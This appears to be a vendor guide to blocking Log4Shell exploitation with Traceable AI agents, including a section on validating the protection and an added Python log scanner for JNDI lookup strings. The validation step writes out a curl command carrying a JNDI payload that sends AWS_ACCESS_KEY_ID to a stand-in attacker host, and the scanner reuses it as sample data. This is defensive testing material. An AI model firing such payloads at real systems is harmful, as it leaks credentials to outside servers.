Log4Shell / Log4j Vulnerability Quick Start Protection Guide


Summary

Log4Shell is one of the most impactful vulnerabilities we have seen in recent times. Traceable AI provides quick and complete protection for your applications against Log4Shell exploitation. In most environments, Traceable AI can provide comprehensive coverage for securing cloud native applications, both at the edge and from within the application.

Here is how to use Traceable AI to provide protection for your applications in 4 simple steps.

Step / Why:

1. Sign up free for Traceable AI - for new Traceable AI users (existing users skip this step).
2. Install the Traceable AI Platform Agent - required.
3. Install the Tracing Agent in your Java application - provides the most comprehensive protection from known and unknown threats.
4. Install the Tracing Agent on your gateway(s) - provides signature-based protection from known threats and helps mitigate DoS attacks.

After step 2, you must complete step 3 and/or step 4.

Note: Existing Traceable AI users can skip steps 1 and 2 and focus on steps 3 and 4.

Meet with a security expert

Our crack security research team is happy to meet with you to talk about Log4J or other challenges.

Complete protection against Log4Shell using Traceable AI

Step 1: Sign up free for Traceable AI

Using a business email, create an account and sign up for Traceable AI. You will need to confirm your email address as part of the signup process and log into your Traceable AI account.

Step 2: Install the Platform agent

The Platform Agent is an extension of the Traceable AI platform that runs local to your application environment. It is a required component which receives the data from the Tracing Agents, applies redaction, and then relays the data to the Traceable AI platform.

  1. After logging in, you’ll be shown the “Welcome to Traceable AI” screen. Click “Install Now”.
  2. Next, you’ll be shown the “Getting started with Traceable AI” screen. Click “Next”.
  3. You’ll be asked to install a Traceable AI Platform Agent.
  4. Select where and how you’d like to install it and follow the provided instructions.
  5. Once the upper right says you are “Successfully deployed”, click the “Next” button.

Step 3: Install the Tracing Agent in your Java Application

Install the Java agent to comprehensively protect the application from Log4Shell exploits. Traceable automatically protects the application by preventing it from invoking JNDI lookup calls altogether.

No configuration or blocking rules are required with this option.

1. You should find yourself on the “Install Tracing Agents” screen which will show you installation options.

2. On the “In-App Instrumentation” panel in the upper left, click on the Java icon to get instructions on installing the Java Tracing Agent.

3. Select your installation target (Java should already be selected as the language), and then follow the provided instructions.

That’s it! You are protected from the Log4Shell vulnerability within your application.

Keep reading and follow Step 4 to also block Log4Shell at your gateway(s).

Step 4: Install the Tracing Agent on your Gateway(s) (Optional)

To block Log4Shell-related exploits with signature-based protection for known threats, and to mitigate DoS attacks related to the Log4j vulnerability, you can install a Traceable AI Tracing Agent on your gateways. It can be installed on API gateways, load balancers, or proxies by following the steps below.

You should find yourself back on the “Install Tracing Agents” screen which will show you installation options.


1. Install the Tracing Agent(s)

There are multiple Tracing Agent installation options. You can install on any number of gateways. Follow the appropriate instructions below.

If installing a Tracing Agent in NGINX

  1. Click on the NGINX icon in the “Webservers” tile to get detailed instructions.
  2. On the “Installing Traceable Agents – NGINX” screen, follow the instructions for your OS to install the agent into NGINX.
  3. Once the upper right says you are “Successfully deployed” click the “Back to Tracing Agents” link in the upper left part of the screen.

If installing a Tracing Agent in the Kong API Gateway

Follow the detailed instructions in the installation documentation.


If installing a Tracing Agent on another supported gateway

Visit the appropriate installation documentation.


2. Confirm Configurations

Next, make sure that everything is enabled properly for detection and blocking from your gateways.

a. We need to leave the guided setup and go to the administration screen. To do this, click on “Cancel” in the upper left.


b. From the user menu in the upper right corner, select “Administration”.


c. On the Administration screen, select “Policies” on the left menu (under the “Protection” section) (1), then make sure that Detection is “Enabled” (2).


d. On the same “Policies” screen (1), scroll down until you see the “Known Vulnerabilities” section. Make sure that “Java Application Attacks” is enabled (2). Then click on the “Blocking Settings” link to the right of it (3), and make sure that both “Java Log4j” rules are also enabled (4).


e. Congratulations! You are now set up for signature-based detection and blocking of known attacks at your edge. You can close this admin window using the “Close” control in the upper left corner of the window.


CONGRATULATIONS:

You are now comprehensively protected against the Log4Shell vulnerability at both the edge and within your application.

NOTE: By default, the Traceable Java tracing agent blocks all JNDI lookups. If your existing application cannot function and log properly with JNDI lookups disabled, you can still enjoy the protection of Traceable. To keep JNDI lookups enabled (that is, to NOT disable them), set the following environment variable on the application pod:

TA_BLOCKING_LOG4J2_JNDI=false

We’re with you

If you encounter any issues with deployment or use, please reach out with any comments, questions, or concerns to support@traceable.ai or on our support website.

Validate Your Protection

A) Have your test tools send the malicious payloads to the application. You can also use a simple script with curl commands to hit the right endpoints within your application, for example:

curl http://<host:port>/<url> -H 'X-Api-Version: ${jndi:ldap://attacker.host.name/${env:AWS_ACCESS_KEY_ID}}'

Replace host, port, and url with the right values for your application.

B) You will be able to see the details of all attackers attempting to exploit this vulnerability under the Attackers and Events pages.

C) You can click through the details above to see the details of the security event and all details about the attacker, including user/IP information, location, User-Agent, etc.

Attacks blocked at the edge using the Policy approach above will show up under Events -> Blocked with Sub Category – Java Log4j: JNDI Exploitation (CVE-2021-44228) (T900).

Attacks blocked within the application will indicate Java Log4j in the event description. These have been blocked automatically for you by our tracing approach, with no configuration and no blocking rules required.

D) Go through Analysis/Traces to see the details of the individual requests and responses where Log4Shell exploits were detected and blocked.
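To cross-check what the validation probe above looks like in your own gateway or access logs, here is an added example (not Traceable's code) that scans constructed, page-independent log lines for the `${jndi:...}` lookup pattern, records the source IP, carrying header, JNDI provider and target host, and flags nested lookups such as the `${env:AWS_ACCESS_KEY_ID}` leak in the probe. The log line layout is an assumption made for the sample; adapt `LINE_RE` to your log format.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not from the page). The first line carries
# the exact probe header from validation step A; the others are benign traffic
# and a second probe using a different JNDI provider.
SAMPLE_LOG = [
    '203.0.113.7 GET /api/v1/items hdr:X-Api-Version="${jndi:ldap://attacker.host.name/${env:AWS_ACCESS_KEY_ID}}"',
    '203.0.113.7 GET /api/v1/items hdr:X-Api-Version="2.1"',
    '198.51.100.9 GET /login hdr:User-Agent="${JNDI:rmi://198.51.100.9:1099/obj}"',
    '198.51.100.9 GET /health hdr:User-Agent="curl/7.79.1"',
]

# Assumed log layout: "<ip> <method> <path> hdr:<Header-Name>="<value>""
LINE_RE = re.compile(r'^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) hdr:(?P<header>[^=]+)="(?P<value>.*)"$')
# ${jndi:<provider>:<rest>} -- case-insensitive, tolerant of stray whitespace
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:(?P<rest>[^}]*)', re.IGNORECASE)
# Nested lookups inside the JNDI string are used to leak environment/system data
INNER_RE = re.compile(r'\$\{(?:env|sys|java|date|ctx)[^}]*\}', re.IGNORECASE)

@dataclass
class Finding:
    source_ip: str
    header: str
    scheme: str          # JNDI provider, e.g. "ldap"
    target_host: str     # host the victim would be made to contact
    leaked_lookups: list # nested lookups such as ${env:...} found in the payload

def scan_value(value: str):
    """Return (scheme, host, leaked_lookups) if value carries a JNDI lookup, else None."""
    m = JNDI_RE.search(value)
    if not m:
        return None
    host_m = re.match(r'\s*//([^/:]+)', m.group('rest'))
    host = host_m.group(1) if host_m else ''
    return m.group('scheme').lower(), host, INNER_RE.findall(value)

def scan_log(lines):
    """Parse each log line and collect one Finding per header carrying a JNDI lookup."""
    findings = []
    for line in lines:
        lm = LINE_RE.match(line)
        if not lm:
            continue  # skip lines that do not match the assumed layout
        hit = scan_value(lm.group('value'))
        if hit:
            scheme, host, leaked = hit
            findings.append(Finding(lm.group('ip'), lm.group('header'), scheme, host, leaked))
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.source_ip} {f.header}: jndi/{f.scheme} -> {f.target_host} leaks={f.leaked_lookups}")
```

Running it over real logs after step A should show exactly the probes you sent; any finding you did not send is an attacker to look up on the Attackers page.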

Current coverage as of 12/20/2021

For CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105, use Traceable AI Java Agent 1.0.5 to address and protect against these vulnerabilities.

You are now comprehensively protected against the Log4Shell vulnerability at both the edge and within your application. We continue to research other variants of the vulnerability as details emerge, and will keep updating our protection mechanisms to keep your applications and APIs protected.